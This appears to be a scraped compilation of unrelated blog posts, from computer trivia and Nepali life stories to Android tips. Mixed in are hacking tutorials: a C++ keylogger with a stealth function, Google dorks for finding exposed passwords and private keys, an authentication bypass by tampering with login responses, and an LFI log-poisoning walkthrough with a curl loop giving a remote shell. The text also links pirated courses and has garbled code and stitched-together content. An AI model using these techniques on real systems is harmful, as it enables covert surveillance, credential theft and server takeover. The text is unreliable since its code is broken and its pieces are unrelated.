6 amazing things you didn’t know about your computer

It’s a ritual across the globe: somewhere between sticking the kettle on and complaining about last night’s match, you’ll probably hit the button on your ageing company PC and wait while it slowly thinks about turning on. Rather than take it for granted, though, it’s worth taking a couple minutes to realize a few of the things that your poor robot slave does without you ever knowing.

1. Bits, Bytes, and Size

Next time you complain about the pitiful memory capacity of your old 8GB iPod Touch, it’s worth remember what makes up eight whole gigabytes. Computer science grads will know that in every gigabyte, there’s 1024 megabytes; 1024 kilobytes in a megabyte, and 1024 bytes in a kilobyte. Breaking it down to the lowest level, you’ve got 8 bits in a byte.
Why does that matter? Because on a flash drive, each bit of data is made up of eight separate floating gates, each comprising two physical transistors, which can basically record themselves as either a ‘1’ or a ‘0’. (Want to be impressed ever further? Each floating gate actually relies on quantum mechanics to work.) That means that an 8GB iPod Touch – the one you were laughing at a minute ago for being puny – has, according to my back-of-the-napkin maths, 549,755,813,888 individual gates arrayed inside that svelte aluminium body. Mighty clever engineering indeed.

2. Everything you see or hear on the internet is actually on your computer

All your computer-whizz friends probably delight in telling you how having a ‘library’ of videos is so 2008, that no-one torrents any more, it’s all Netflix and iPlayer and ‘The Cloud’, whatever that means. But, you might want to remind them: every time you stream a video or the week’s latest Top 40 off the web, it’s actually, technically playing off your computer.See, every internet media file has to make a local copy of itself on your machine, first. Ever wondered what that white buffering bar means on YouTube or Netflix? It’s the amount of video that’s been copied to the local cache, a.k.a. the amount you can still watch if your internet decides to up and die.

3. The distance data travels

A quick experiment for you: click this link, which should take you to Wikipedia. With one click, you’ve just fetched a bunch of data from servers in Ashburn, Virginia, about 6000km away. Your request has travelled from your computer, through a local Wi-Fi router or a modem, up to a local data centre, from there onwards (under the Atlantic Ocean, if you’re in the UK), all the way to Virginia, and back again – in around 0.1 of a second, depending on how good your internet connection is.
By comparison, your body takes around 0.15 of a second for a signal to pass from your fingers, up your spinal cord to the brain, and back down again.

4. Counting Starts at Zero

At a base level, every computer’s just a really big, complicated calculator. But thanks to the way its intrinsic circuitry works – with lots of little logic gates that are either ‘on’ or ‘off’ – every action that takes place at a base level is happening in binary, where things are either a 1 or a 0, with no shades of grey in between.
This actually translates up to a neat bit of programming trivia – in the computer science world, all counting (with the rather notable exceptions of Fortran and Visual Basic) starts at zero, not one.
It actually makes a lot more sense – ever thought about why the 20th century refers to the 1900s? It’s because when historians decided on the dating system, they weren’t clever enough to call the very first century (0-99AD) the 0th century. If they had, we’d probably have far fewer confused school children the world over.

5. The work that goes into a Ctrl+C, Ctrl+V

One rather under-appreciated fact about solid state drives (SSDs), regarded as the gold standard for fast, reliable storage, is the amount of copying they have to do. When you want to copy some data from one bit to another, it’s not just a matter of shuffling the data from one part of the drive to another.
Because of the complicated way a SSD works, over-writing a block of old data with some shiny new data isn’t as simple as just writing the new stuff in with a bigger, thicker Sharpie. Rather, the storage drive has to do some complicated shuffling around.
In practice, this can mean that writing a tiny 4KB file can require the drive to read 2MB (that’s thousands of times more data that the 4KB file you’re trying to write), store that temporarily, erase a whole tonne of blocks, then re-write all the data. It’s rather labour-intensive, so think before you juggle your files around next time.

6. Code isn’t as clean as you think

The majority of us put faith in bits of technology you don’t quite understand – be it committing your life to a 747, or your dirty pics to Snapchat’s auto-delete. When you do you generally tend to assume that the code’s been scrupulously examined by teams of caffeine-fuelled programmers, with most of the niggling little bugs found and nixed.
The truth seems to be quite the opposite. One Quora user pointed out that buried within the source code for Java, one of the internet’s fundamental bits of code, is this gem:
/**
* This method returns the Nth bit that is set in the bit array. The
* current position is cached in the following 4 variables and will
* help speed up a sequence of next() call in an index iterator. This
* method is a mess, but it is fast and it works, so don’t f*ck with it.
*/
private int _pos = Integer.MAX_VALUE;
It just goes to show that even programmers rush things to get home for the next installment of Game of Thrones sometimes.

Life Story: Dolma Lama: From Daughter to Mother

Dolma Lama: From Daughter to Mother

Dolma Lama is a well-known television artist of Nepal, who also played the role of Phurwa’s mother in the first episode of Katha Mitho Sarangiko. Dolma in her real life has faced lots of ups and downs as a struggling woman. Born in a remote village of Helambu in Northern mountain region of the country, her life stories can be inspiration to many people. Dolma has given an interview for the magazine program of the KMS, Sarangiko Bhalakusari. Here is some excerpt from the interview, in her words:
“I am going to tell the truth about my real life. In the very early age I came to Kathmandu from my village to work as a labourer in a carpet factory. While weaving the carpets in the factory people told me that I could never make money with such a job. They suggested I go to India to find some work. Jammu Kashmir region was very popular among migrant workers at that time. At the age of 15, I went to Jammu to work as a road construction labourer. While I was there, I found a guy. I liked him. He proposed marriage. He said if I did not get married to him he would leave me and go to another place. He was helping me to find work there. I was so afraid of losing my job if he left me. I was very young at that time. I did not know about right and wrong. So at that early age I got married with that guy fearing I would lose the job if I did not marry.
MARRYING YOUNG

But after the marriage I started realizing that marriage needs lots of understanding between a boy and a girl. I started regretting about getting married in a hurry. My husband was quite a lot older than me. There was a lack of understanding as well. Still I loved him. We were doing well for a few years. But we were very poor. Because of poverty there would be misunderstanding and quarrels about small things. He used to get angry over small things and often beat me. I stayed with him until I was 29. But everything has got its limit. I could not tolerate the violence and harassment anymore. Then I decided to leave him. I told him that we cannot go on living like this. We agreed that we can live apart. Then we left each other in a kind of understanding.
MY CHILDHOOD
I was really happy to be a part of the drama. Though I acted in many video programs in the past, this is a new experience for me. I was born in Helambu. My childhood was spent in a typical farming village. I used to work hard in the farm, going to the forest to collect grass and firewood, carrying heavy loads of water and crops. The role I played in the drama, reminded me of my childhood and my mother.
DAUGHTERS AND MOTHERS

In the drama I support my daughter against my husband. In the real life also, there is same kind of situation. Fathers are always sceptical about the behaviours of their daughter. They are more worried about daughters. But there are many things daughters and mothers have in common. Daughters are closer to their mothers. They share more with their mothers than their fathers. They get afraid of their fathers and so do not communicate well.
In the drama Phurwa decides for herself whom she marries. The first thing to remember is that people in the village are not educated. They don’t have schools in the village. They don’t know many things about people and places. Parents force their daughters to get married with somebody they like. But girls and boys do not know each other in such cases and their married life can be difficult.
PREPARING FOR MARRIAGE
I am in favour of love marriages. Because boys and girls get a chance to understand each other and are then capable of deciding their own fate. In the drama Phurwa gets married to Harke, but later their marriage fails. Phurwa only see Harke from the outside. She should have looked inside his heart and mind as well. It is very necessary before marriage for a boy and girl to spend a couple of months together to understand each other. It is not good idea to get married just because of infatuation. The culture of getting married to a Lahure (somebody who has returned from military service abroad) widely prevails in the rural community. People think that the Lahure is rich and can make girls happy.
THE FUTURE
Now I have got three daughters and a son. I am worried about their future. I am giving much time to my children for their education and future planning. Besides the family, I do other things like acting and singing for money making. At the moment I am preparing to release a music album. I have already sung in nearly a dozen of music albums.
I am really happy to be in this program to share some of my experience and feelings. I am also thankful to all the audience who are listening me.

Life Story: My ‘Grandma’ the Witch

I have a very vivid memory from my childhood of an old woman who used to live in my village, Bauka Jhoda, near Itahari. I used to call her ‘grandma’. She was around 60 years old. She lived with her husband and children. Villagers accused her of being a witch. If somebody became ill, the shaman would single her out and blame her, saying she drank blood. She was a poor dallit and had now way of defending herself. My parents warned me against her, but I was always in her house; as far as I was concerned she was an innocent grandma who loved me a lot. We used to take the cows up to graze together. I used to play with her son. I couldn’t help wondering why the villagers accused her being a witch.
She had little land and hut to live in. But because of the campaign of hatred waged against her by the people in the village, she could not stay in the village. So, she planned to sell her property and move to another place. The problem was that everybody was ready to buy her property but nobody was ready to sell land to her. Basically, they didn’t want to take the risk – as they saw it – it of doing business with a woman who was known as witch.
She went to different villages trying to buy some land but they accused her of being a witch and refused to sell to her. It was heart breaking for her – always having to move on.
Finally, she was able to buy a small bit of land in another village. But that land, although it was on the bank of river, was useless and barren.
Today she must be around 70s. Villagers still called her a witch. I last saw her a year ago. I’ve tried over the years to convince people that she is a harmless old woman. Nobody wants to talk to her, and she is still afraid of going to others houses for fear of being abused. Now, she is waiting for death to take her away, weighed down by years of abuse, but retaining her dignity.
I salute you grandma and bow my head in front of your patience. But I can never forgive myself for not being with you now to defend you. I am very sorry!
Meghraj Rasaili
BBC World Service Trust, Nepal
Producer- Sajha Sawal
- See more at: http://bbcnepalidrama.com/main/node/18#sthash.FtUS1KbK.dpuf

100 Useful RUN Commands for Windows

1. Windows Version – winver
2. Windows System Security Tool – syskey

3. Windows Firewall - firewall.cpl
4. Add/Remove Programs - appwiz.cpl
5. Administrative Tools - control admintools
6. Automatic Updates - wuaucpl.cpl
7. Bluetooth Transfer Wizard - fsquirt
8. Calculator - calc
9. Certificate Manager - certmgr.msc
10. Character Map - charmap
11. Check Disk Utility - chkdsk
12. Clipboard Viewer - clipbrd
13. Command Prompt - cmd
14. Component Services - dcomcnfg
15. Computer Management - compmgmt.msc

What is Web Development ?

What is Web Development ?

As we are completely surrounded with internet we are also surrounded with website thorough which we access information from the internet, the main reason behind the creation of the Internet was to share information throughout the world in an easy way, so to access those information website is created where the information is kept or stored and we visit those websites to gain access to those information..But how and from where does websites come and here come the Web Development, the process of creating or developing websites is called Web Development.

Within the rise of internet users different reason came out and people wants more than just information from Internet.

Social Networking is a huge part of Web/Internet among the top 10 ranked websites based on visitors 3 to 4 of them are Social Networking Web Sites i.e Facebook, Twitter, Yahoo..etc

Even on the Web Application sector in the top 10 majority of them are social networking apps i.e Facebook, Twitter, Whatsapp, Tango, Skype..etc I can keep on writing the whole day these social apps name.

Back to our agenda Web Development is the process of creating or developing a Website.

Is Web Development a Good Path for Future ?

This is a good question for a newbie or someone who is interested in Web Development but still didn't started on it.
Well to be honest I will say yes it is because every day new Companies are establishing and every will need a website to promote its existence on the web as nowadays it is the most visited place I must say, even we search for how to tie shoe laces or sometimes we even search for how to start a company, Our Searches can be for really small needs as well as some serious stuff so if you have a company you need a website for it and to get a website most of the times you need a web developer and not only a developer but you need someone to maintain it too.
It is a popular field now and many people are starting to be a good web developer and the ones who are a good developer they are earning a fair amount of money..Following is a chart of annual salary of web developers across the world.

Is it hard to be a Web Developer ?

Nothing is easy to obtain but as compared to other fields in Computer Science Web Development is easier to understand than others as there are a list of languages which you must learn but most of them are easy to learn. When you will start everything will seem like complicated and hard but with few days it will get clear.

How should I start ?

That's the most common question by the beginners in any field and its one of the hardest question to solve but here in Web Development there are few principles which you should follow i.e every website needs a webpage and that webpage first requires some information typed on it and then it needs to be designed ex. font color, background image..etc and then you make it interactive then can make it a dynamic webpage by some web programming languages then if you want you can have a database. So there each and every step requires you to learn a language through which you can accomplish them.
Here is the Basic Concept

Task to accomplish           Language RequiredCreate a Webpage with contents

                  HTML

Design the Webpage                           CSSInteractive Webpage                JavaScript, jQueryDynamic Website                            PHPDatabase                          MySql

These languages discussed here aren't the only languages available in Web Development but these are the languages you must know and are the most popular web developing languages out there!

It seems really hard to get hang of all these languages, but trust me they are really easy to learn and you don't need to master all of them but you must know them for example you can only go for the basics of CSS, JavaScript and jQuery and these languages are mastered by the Web Designers ..

Where should I Start from ?

You can start by learning in the following flow respectively 

• HTML/CSS
• JavaScript (Basics)
• jQuery (Basics)
• PHP
• MySql

LanguageLevelDuration (Average)HTML+CSSEasy2 weeksJavaScript (Basics)Intermediate1 monthjQueryIntermediate3 weeksPHP + MySql (Basics)Intermediate1 months 15 daysPHP + MySql (Beyond The Basics)Intermediate1 months 15 days

    

Best Courses for Beginner's :

Lynda.com is one of the best Source to start learning from for beginners but its really expensive..No Worries I will give you the torrent link of those courses through which you can start learning them now :)

Following are the Courses you MUST Take

Lynda.com - Web Technology Fundamentals

Lynda.com - HTML and HTML5 Basics

Lynda.com - JavaScript for Web Designers

Lynda.com - jQuery Essential Training

Lynda.com - PHP with MySQL Essential Training

Lynda.com - PHP with MySQL Beyond the Basic

Download all course for free with torrent link:

http://www.toofile.com/fod09epfs2kn/torrent-link.tar.gz.html

How to Spoof MAC Address on Android Phones

A Media Access Control address (MAC address) is a 12-character unique identifier assigned to a specific piece of hardware such as the network adapter of your WiFi device. In simple words, a MAC address can be used to uniquely identify your Android phone on the Internet or the local network.

Spoofing MAC Address on Android Devices

Even though MAC address is embedded on the hardware device during manufacture, it can still be spoofed to input a new one of your choice. Here is a detailed instruction on how to spoof MAC address on your Android phone.

Before you spoof the MAC address, you need to record the original/current MAC address of your device which can be done according to the instruction below:

• On the Home Screen of your phone, tap Menu button and go toSettings.
• Tap About Device and go to Status
• Now scroll down to record the 12-digit code shown under Wi-Fi Mac address. An address would read something like:
  

  Example MAC address: E5:12:D8:E5:69:97

Requirements for Spoofing the MAC Address

1. Rooted Android Phone
2. BusyBox app installed on your phone
3. Once BusyBox is installed, you need to install Terminal app

Once the above requirements are satisfied, follow the instructions below to spoof your MAC address:

1. Open the Terminal app and type the commands as listed below:
   
   

   $ su [HIT ENTER]
   

   $ busybox iplink show eth0 [HIT ENTER]
   (This will show your current MAC address, just for your confirmation)



2. Now, type the following command:
   
   

   $ busybox ifconfig eth0 hw ether XX:XX:XX:XX:XX:XX [HIT ENTER]
   (In the above command, replace XX:XX:XX:XX:XX:XX with your new MAC address)



3. You have now spoofed your MAC address successfully. To check for the change enter the following command again:
   
   

   $ busybox iplink show eth0 [HIT ENTER]
   (Now you should see your new MAC address)

I hope you like this post.

15 Cool Internet and Computer Tricks

1. A shortcut to www. and .com.
Anything you type on the URL bar of your browser can be surrounded by www. and .com by just pressing CRTL + Enter.
2. How to find music downloads easily?

In Google search bar, type the following strings:

-inurl:(htm|html|php) intitle:"index of" +"last modified" +"parent directory" +description +size +(wma|mp3) "metallica"

Replace “metallica” with whatever you are searching for. The search string can be used to find music downloads available on public FTP and HTTP sites.
Alternatively, you can also use the search string below.

intitle:index.of?mp3 metallica

3. How to skip intros of most videos on Youtube?
There is a feature on YouTube called that “Wadsworth constant” where you can skip the first 30% of any YouTube instructional video. To use it, just add &wadsworth=1 to the end of the Youtube url. It will skip the first 30% of videos which may include the boring introduction.
4. How to go directly to the Task Manager?
Instead of the usual CTRL + ALT + Delete for Windows, you can press CTRL + Shift + Esc to go directly to the Task Manager.
5. How to access StickyKeys in Windows?
StickyKeys can help users who have difficulty in holding down two or more keys at a time. It allows you to press just one key at a time instead of pressing them at the same time. To access it, press Shift key 5 times. Your computer will make a cute noise, then you can enable the Sticky Keys.
6. How to re-enable browser’s right click when web pages turn it off?
There are sites that disable the mouse right click commonly due for protection towards picture stealing. An easy way to re-enable the right click is by typing the command below on the URL bar of your browser.

javascript:void(document.oncontextmenu=null)

7. A shortcut in opening a new tab.
You can click a link with the mouse scroll wheel button to open a new tab. You can also use CTRL + left click on the link.
8. How to open the last tab you closed?
You can press CTRL + Shift + T to open the last tab you closed. This works perfectly if you have accidentally closed a browser tab.
9. More uses of CTRL (Control) Key.
Holding CTRL makes your mouse cursor move by full words instead of by characters.
CTRL + Backspace will delete the previous word.
CTRL + arrow keys will jump to the start of the previous word.
CTRL + Home and CTRL + End will move your cursor to the beginning and end of the document, respectively.
In browsers, pressing CTRL + W closes the current tab and CTRL + number (e.g. 1, 2, 3, up to 8) will go the respective tab. CTRL + 9 will go to the last tab.
10. Fast way of clearing cache and refreshing page.
You can press CTRL + Shift + R to clear cache and then refresh web page.
11. How to access Google with no country redirect?
As you have noticed, when you enter google.com in your browser, you are directed to the local version of Google. To use Google without the redirect, you can type in www.google.com/ncr.
12. How to watch age restricted Youtube videos without logging in?
If you encounter an age restricted video on Youtube, it is possible to still watch it by just removing the “watch?” in the URL.
13. Are there any Google Easter eggs?
Go to Google then search for “do a barrel roll”, Google will then do a barrel roll.
Go to Google then search for “zerg rush”, a bunch of animated zergs will appear and attack the web page.
Go to Google then search for “tilt”, Google will tilt.
Go to Google, then type in “atari breakout”, then go to Images. You can play a hidden game in Google images.
14. You can watch an ASCII animation of Star Wars in a telnet session.
On Windows Vista, Windows 7 and Windows 8, go to Command Prompt (or type “cmd” in Run) then type telnet and press Enter. Type “o” without the quotes then press Enter. Now type in “towel.blinkenlights.nl” and press Enter.
For Linux, Mac OS X and Windows XP, just go to the terminal windows (command prompt for Windows XP) then type in “telnet towel.blinkenlights.nl” without quotes.
15. Easy and fast way of tracking your UPS package.
You can search Google for your UPS tracking number, and it will link you to the tracking page for your package.

How To Make A Basic Keylogger in C++

First we need to create a new project.
Click on 'File' > 'New' > 'Project'.
Now choose 'Win32 Console Application' and choose for name "Keylogger".


If you get the 'Win32 Application Wizzard' click on 'Next' and then select 'Empty project' under 'Additional options' and click on 'Finish'.

You should have a empty project now.
Now we will add a .cpp file.

Right click on 'Source Files' and take 'Add' > 'New Item'.


Now take 'C++ File(.cpp)' and name it Keylogger.

then click 'Add'.

Now open Keylogger.cpp and Write this in it:

Code:

#include     // These we need to
using namespace std;   // include to get our
#include    // Keylogger working.
#include    //

Now write this:

Code:

int Save (int key_stroke, char *file);
void Stealth(); //Declare Stealth.

Now we need to make a main function.(The main function will be the first that will be executed.)

Code:

int main() 
{
        Stealth(); // This will call the stealth function we will write later.
    char i; //Here we declare 'i' from the type 'char'

    while (1) // Here we say 'while (1)' execute the code. But 1 is always 1 so it will always execute.
    {           // Note this is also the part that will increase your cpu usage
        for(i = 8; i         {
if (GetAsyncKeyState(i) == -32767)
Save (i,"LOG.txt");    // This will send the value of 'i' and "LOG.txt" to our save function we will write later. (The reason why we declared it at the start of the program is because else the main function is above the save function so he wont recognize the save function. Same as with the stealth function.)
        }
    }
    system ("PAUSE"); // Here we say that the system have to wait before exiting.
return 0;
}

Why You Should Study to Be a Hacker

Before I begin, I want to re-emphasize to all of you that hacking is an elite profession. Hackers are among the top of the heap in the IT industry. Before you ever begin studying hacking, you should ideally have a firm grasp of computer operations, Linux, networking, coding and hopefully, a bit of operating system and application architecture. One doesn't begin hacking without a strong background in these other IT skills. If you do, you will likely give up frustrated. Hacking takes years of study and practice to become proficient and if you try to take shortcuts will likely fail or worse spend a few years in "Club Fed".

The hacker's skills are increasingly sought after in many corners of our profession. Here are just a few.

Penetration Testing

Penetration testing is essentially legal hacking. Organizations hire penetration testers to test the security of their information systems. These penetration testers use all the skills of a hacker to try to "penetrate" or hack these systems. In this way, the company can find the weaknesses in their systems before the malicious hackers do. The is a tremendous shortage of skilled penetration testers and the pay is VERY good.

Security Industry

The information technology security industry continues to expand rapidly as more and more commerce goes to the web and more and more security incursions take place. Information security has become big business and they can not get enough well-trained people. A hacker is highly regarded among this industry as ONLY the hacker understands the true vulnerabilities of information systems. The better one understands the weaknesses of these complex systems, the better they can defend them. So many IT security professionals have never hacked a system and as result really have no idea how to protect. Some of the highest paid individuals in this industry are former hackers.

Private Investigator

Increasingly, private investigators are employing hackers to gather information and evidence in their investigations. Although, at times, this may straddle the lines between legal and illegal hacking, it is important to note that this is sometimes the only way to gather evidence on many a critical case. In most cases, hackers are used by private investigators as contractors to insulate themselves from possible liability. This can be a lucrative employment, but also very risky.

Forensic Investigator

Forensic investigator's are employed by law enforcement, incident response teams of major companies and information security firms. Who better to trace the tracks of a hacker than someone who knows how to hack?
Learning to hack gives the forensic investigator the mindset of the intruder as well as understanding what happened and what clues, evidence or artifacts must be left behind after a cyber attack or other criminal activity.

Cyber Espionage

Spy agencies around the world are employing and looking for more and more hackers to spy on their adversaries. In the U.S., the CIA, the NSA, the FBI and numerous other three letter acronyms are using hacking techniques to foil terrorist attacks, spy on the foreign adversaries and keep track of their own citizens.

Cyber Warfare

In the digital era, warfare is rapidly evolving from being primarily one of guns, tanks, missiles and bullets to cyber warfare. There is a constant undertone of cyber warfare going on every day between adversaries around the world. Whether it be the rebels in Indonesia fighting their oppressive government, to the Arab spring, to Indian v Pakistan, to Russia v Ukraine, etc. all of these conflicts involve an element of cyber warfare. Not only is cyber warfare used to spy on the adversary, but often times it is used to disable critical infrastructure. If I can disrupt the critical supply lines of my adversary, I can make it very hard for them to fight if food, water and ammunition supplies are disrupted digitally. In addition, disruption to such domestic services as electricity, water, water treatment and communication to my adversaries'' citizens is only going to weaken and dispirit them.
Probably the most sophisticated cyber warfare attack to date was the U.S's release of the Stuxnet worm. This advanced worm burrowed into the Iranian uranium enrichment facility to disrupt their ability to enrich uranium for their nuclear ambitions.
Just this last month, August 2014, the major banks in the U.S., including J.P Morgan Chase, were hit by a cyber attack from Russia. It is believed that this cyber attack was in response to the banks cooperating with the U.S. sanctions on Russia for the invasion of the Ukraine. This is simply an indication of how the game of international politics is played in 2014, with cyber attacks a.k.a. hacking.

Authoritarian Government Resistance

Of the millions of people who read Null Byte, many of you are living in countries with authoritarian and abusive governments. Many of these governments will try to limit the use of the Internet to limit free speech and expression, while others will use the Internet as a means of repression. In these cases, having the skills to resist such abuse can be critical to you and your people's freedom.

Network or System Administrator

As a hacker, you need to understand how digital systems work and interoperate. That understanding is often far beyond that which is necessary to be a network or system administrator. These IT personnel are often only taught to "click here, then click here and then click here..." without a full understanding of the system and functionality they are working with. The hacker is often much better equipped to run these systems because they undestand how the systems work and interact, what their weaknesses are, etc.

A Way to Gain Super Admin & Admin Privileges By Bypassing Authentication

While researching and working on bug bounties in late Jan 2013, I have found a way to Bypass Authentication using which we can Takeover all the users account of the website and can also gain Super Admin and Admin privileges if that site is vulnerable to this type of attack.

Using this vulnerability the attacker can bypass the authentication bypass countermeasure and can predict the login validation & access control processes for any victims account by combinding a simple technique and in this way he can also Bypass Authentication of all passwords of all the accounts and can successfully compromise the victims account as the login validation process is predictable by the attacker.

I tried various techniques to Bypass the Login like Arbitrary Methods Usages, Anonymous Methods Usages but all these techniques failed, also there was a countermeasures that if we to modify the response can then if we send that modified response code as a request to the server then the server is not responding to the modified request and instead of replying it is dropping the modified request, so now the challenge was to bypass this countermeasure and also to understand the Login Validation Process and to find a weakness in it. So now I am mentioning how I was able to Bypass this Countermeasure and the Authentication.

Please Note: There was a precondition that an attacker shall now the victims login id or user id and shall lock the victims account.

During the testing we have found an attacker can bypass authentication of Super Admin, Admin & Normal(Read Only privileged ) users by locking the victims account and by modify the response json message.

Steps to Execute the Attack:

1. Go to the application login page and lock the victims account with 3 wrong password attempts.

2. Now Insert the normal(test) users username and with any random value as password.

3. Intercept the login request and forward it now the original response will be intercepted like mentioned below:

Original Response:

HTTP/1.1 200 OK
Server: Apache-Coyote
Content-disposition: attachment
Content-Type: application/json;charset=utf-8
Content-Length: 88
Date: Wed, 16 Jan 2013 10:05:20 GMT

OK[10,0,0,0,0,["site.com","You Account has been Locked, Please contact Administrator."]]

4. Now modify the original response as mentioned below but don't modify the status code 200 OK or any headers and forward the request, now the attacker successfully logs into the Normal Users(victims) account.

Modified Response to Bypass Authentication of Normal User:

HTTP/1.1 200 OK
Server: Apache-Coyote
Content-disposition: attachment
Content-Type: application/json;charset=utf-8
Content-Length: 44
Date: Wed, 16 Jan 2013 10:09:10 GMT

OK[10,0,0,0,0,["site.com,"N","Normal User"]]

Note: "10" denotes normal user and "N" denotes read only privilege.

5 Vulnerabilities That Surely Need a Source Code Review

Approach for Source Code Review

The approach for SCR is fundamentally different from an Application Penetration Test. While an Application Penetration Test is driven by apparently visible use-cases and functionalities, the maximum possible view of the application in terms of its source code and configuration is usually available during an SCR. Apart from auditing important use-cases following standard practices, our approach consists of two broad steps:

Finding Security Weaknesses (Insecure/Risky Code Blocks) (Sinks)

A security weakness is an insecure practice or a dangerous API call or an insecure design. Some examples of weaknesses are:

• Dynamic SQL Query: string query = "SELECT * FROM items WHERE owner = '" + userName + "' AND itemname = '" + ItemName.Text + "'";
• Dangerous or risky API call such as RunTime.exec, Statement.execute
• Insecure Design such as using only MD5 hashing of passwords without any salt.

Correlation between Security Weakness and Dynamic Input

Dynamic construction of an SQL Query without the necessary validation or sanitization is definitely a security weakness, however it may not lead to security vulnerability if the SQL query does not involve any untrusted data. Hence it is required to identify code paths that start with an user input and reaches a possibly weak or risky code block. The absence of this phase will leave huge number of false positive in the results.

This step generally involves enumerating sources and finding a path between source to sink. A source in this case is any user controlled and untrusted input e.g. HTTP request parameters, cookies, uploaded file contents etc.

Using Google.com to find Usernames and Passwords

Method 1: Facebook!
We will be using a google dork to find usernames and passwords of many accounts including Facebook!

The Dork: intext:charset_test= email= default_persistent=
Enter that into Google, and you will be presented with several sites that have username and passwords lists!


Method 2: WordPress!

This will look for WordPress backup files Which do contain the passwords, and all data for the site!
The Dork: filetype:sql inurl:wp-content/backup-*

Method 3: WWWBoard!

This will look for the user and passwords of WWWBoard users
The Dork: inurl:/wwwboard/passwd.txt

Method 4: FrontPage!

This will find all users and passwords, similar to above.
The Dork: ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-"

Method 5: Symfony!
This finds database information and logins
The Dork: inurl:config/databases.yml -trac -trunk -"Google Code" -source -repository

Method 6: TeamSpeak! (big one!!!!!)
This will search for the server.dbs file (a Sqlite database file With the SuperAdmin username and password!!!)
The Dork: server-dbs "intitle:index of"

Method 7: TeamSpeak2!!! (also big!)
This will find the log file which has the Super Admin user and pass in the Top 100 lines. Look for "superadmin account info:"
The Dork: "inurl:Teamspeak2_RC2/server.log"

Method 8: Get Admin pass!
Simple dork which looks for all types of admin info
The Dork: "admin account info" filetype:log

Method 9: Private keys! (not any more!)
This will find any .pem files which contain private keys.
The Dork: filetype:pem pem intext:private

And the Ultimate one, the regular directory full of passwords....
Method 10: The Dir of Passwords!
Simple one!
The Dork: intitle:"Index of..etc" passwd

Enjoy! ;)

Remote Shell PHP via LFI

1. Find the LFI vulnerability in website

2. Inject web shell into log file with useragent or x-forwarded-for header or something that logger will log it.
# curl -s -A '' 'http://target.com/' -o /dev/null

3.  When you can inject web shell, try use the shell with any command such as id, pwd, ls
# curl -s 'http://target.com/include.php?page=../../../../../../var/log/access.log&cmd=id'

4. Now you're ready to get the remote shell is similar that you are directly interactive in target.com's shell.(Run this in our shell)
# while true; do read -p 'cmd>' cmd; cmd=$(php -r "echo urlencode('$cmd');"); curl -s "http://target.com/include.php?page=../../../../../../var/log/access.log&cmd=$cmd" ; done

5. Now you will browse to "http://target.com/include.php?page=../../../../../../var/log/access.log&cmd=" and send command continuously similar you are in the target.com

Hidden Secret Codes for all Android Devices [LATEST]

One of the most popular practices amongst software developers is to leave ‘backdoors’ within the code, which essentially allow anyone with knowledge to get into the system at a much deeper level than you’d expect from an end-user. These backdoors aren’t always with a malicious intent; most of the time, they allow the OEM or programmer to get into the system for troubleshooting when other, usual modes of access have been blocked. They can be quite friendly and helpful if you know what you’re doing.
Smartphones have a good share of these as well, where they’re generally known as secret codes. Most of the time, these numeric/symbolic sequences allow you to access hidden menus, diagnostic tests, areas that could change some of the most basic parameters of your device and whatnot. These secret codes, in fact, have not been exclusive to smartphones, but have long been a part of the dumb-phones and then the feature-phones before most major OEMs joined the smartphone bandwagon. For those devices that run Android, certain codes are shared across the board, and hence, can be used on a variety of devices.

What follows is a collection of some of the secret codes common to the Android platform. All of these would be entered through the phone dialer (just punch in the sequence as shown). Since most hidden menus are manufacturer specific, there’s no guarantee that they’ll work across all Android smartphones, but you can try them out nevertheless on your Samsung, HTC, Motorola, Sony and other devices. Be advised, though, that some of these can cause serious changes to your device’s configuration, so don’t play with something that you don’t fully understand.

*#06# – IMEI number

*#0*# – Enter the service menu on newer phones like Galaxy S III

*#*#4636#*#* – Phone information, usage statistics and battery

*#*#34971539#*#* – Detailed camera information

*#*#273282*255*663282*#*#* – Immediate backup of all media files

*#*#197328640#*#* – Enable test mode for service

*#*#232339#*#* – Wireless LAN tests

*#*#0842#*#* – Backlight/vibration test

*#*#2664#*#* – Test the touchscreen

*#*#1111#*#* – FTA software version (1234 in the same code will give PDA and firmware version)

*#12580*369# – Software and hardware info

*#9090# – Diagnostic configuration

*#872564# – USB logging control

*#9900# – System dump mode
*#301279# – HSDPA/HSUPA Control Menu

*#7465625# – View phone lock status

*#*#7780#*#* – Reset the /data partition to factory state

*2767*3855# – Format device to factory state (will delete everything on phone)

##7764726 – Hidden service menu for Motorola Droid
Screenshot


Update x1: More codes!

*#*#7594#*#* – Enable direct powering down of device once this code is entered

*#*#273283*255*663282*#*#* – Make a quick backup of all the media files on your Android device

*#*#232338#*#* – Shows Wi-Fi MAC address

*#*#1472365#*#* – Perform a quick GPS test

*#*#1575#*#* – For a more advanced GPS test

*#*#0283#*#* – Perform a packet loopback test

*#*#0*#*#* – Run an LCD display test

*#*#0289#*#* – Run Audio test

*#*#2663#*#* – Show device’s touch-screen version

*#*#0588#*#* – Perform a proximity sensor test

*#*#3264#*#* – Show RAM version
*#*#232331#*#* – Run Bluetooth test

*#*#232337#*# – Show device’s Bluetooth address

*#*#7262626#*#* – Perform a field test

*#*#8255#*#* – Monitor Google Talk service

*#*#4986*2650468#*#* – Show Phone, Hardware, PDA, RF Call Date firmware info

*#*#1234#*#* – Show PDA and Phone firmware info

*#*#2222#*#* – Show FTA Hardware version

*#*#44336#*#* – Show Build time and change list number

*#*#8351#*#* – Enable voice dialling log mode, dial *#*#8350#*#* to disable it

##778 (+call) – Show EPST menu
-------------------------------------------------------------------
Codes specific to HTC devices only:

*#*#3424#*#* – Run HTC function test program

*#*#4636#*#* – Show HTC info menu
##8626337# – Run VOCODER

##33284# – Perform field test

*#*#8255#*#* – Launch Google Talk service monitor

##3424# – Run diagnostic mode
##3282# – Show EPST menu

##786# – Reverse Logistics Support
Note: Not all codes are supported in a phone. Try these codes at your own risk.

Details of Windows Processes

Idle and System

• Created by ntoskrnl.exe via the process manager function, which creates and terminates processes and threads.
• No visible parent processes
• System has a static PID of 4
• System creates smss.exe
• There should only be one system process running

SMSS – Session Manager

• First user mode process
• Parent process is System
• Base Priority of 11
• Username: NT AUTHORITY\SYSTEM
Performs delayed file delete/rename changes
Loads known dlls
Runs from %systemroot%\System32\smss.exe
Creates session 0 (OS services)
Creates session 1 (User session)
Creates csrss and winlogon then exits, which is why they have no parent process and they both have session ids of 1
Runs within session 0
Only one smss.exe process should be running at one time. The second smss.exe process exits, so you will only see the one running in session 0.
There can be more sessions if more users are logged on to the system. 0 and 1 are for a single user logged onto the system.

CSRSS.EXE – Client/Server Run

• Windows subsystem process.
• Base Priority of 13
